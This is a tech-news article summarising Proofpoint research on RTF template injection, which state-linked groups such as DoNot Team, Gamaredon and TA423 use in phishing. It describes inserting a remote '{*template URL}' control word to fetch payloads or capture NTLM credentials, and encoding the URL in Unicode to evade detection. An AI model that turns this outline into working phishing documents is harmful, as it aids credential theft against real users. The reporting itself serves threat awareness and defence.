RTF injection is increasingly used for phishing by government sponsored hackers

RTF injection is increasingly used for phishing by government sponsored hackers

Tech Highlights:

  • This technique is a simple but effective way to download malicious content from a remote URL, and security researchers believe it will soon be adopted by a larger number of threat actors.

  • In their latest phishing attacks, three APT cyber groups from India, Russia, and China were discovered using a novel RTF (rich text format) template injection approach.

Researchers at Proofpoint spotted the first cases of weaponized RTF template injection in March 2021, and since then, actors have been steadily optimizing the technique.

Rich Text Format (RTF) files are a document format created by Microsoft that can be opened using Microsoft Word, WordPad, and other applications found on almost all operating systems.

A simple method to fetch payloads

When creating RTF files, you can include an RTF Template that specifies how the text in the document should be formatted. These templates are local files imported into an RTF viewer before displaying the contents of the file to format it correctly.

While RTF Templates are meant to be hosted locally, threat actors are now abusing this legitimate functionality to retrieve a URL resource instead of a local file resource.

This substitution allows threat actors to load malicious payloads into an application like Microsoft Word or perform NTLM authentication against a remote URL to steal Windows credentials. Furthermore, as these files are transferred as RTF Templates, they are more apt to bypass the detection phishing lures as they are not initially present in the RTF files.

Creating remote RTF Templates is very simple as all a threat actor has to do is add the {*template URL} command into an RTF file using a hex editor A URL-hiding example created by Proofpoint’s researchers

The method is also viable on doc.rtf files opened in Microsoft Word, forcing the app to retrieve the resource from the specified URL before serving the content to the victim Cases of abuse in the wild

Proofpoint has observed this payload retrieval method on phishing campaigns by the pro-Indian hacking group DoNot Team, the Russia-linked Gamaredon hacking group, and the TA423 threat actors. Timeline of activities relevant to RTF template injection

RTF files can parse 16-bit Unicode characters, so threat actors have been using Unicode instead of plaintext strings for the injected URL resource to evade detection. However, in some samples retrieved by the DoNot Team campaigns, Proofpoint noticed a failure to pass Microsoft Word’s checks, resulting in an error message about the remote source being invalid.

We will be happy to hear your thoughts

      Leave a reply

      Tech Reviews, News and Guides
      Logo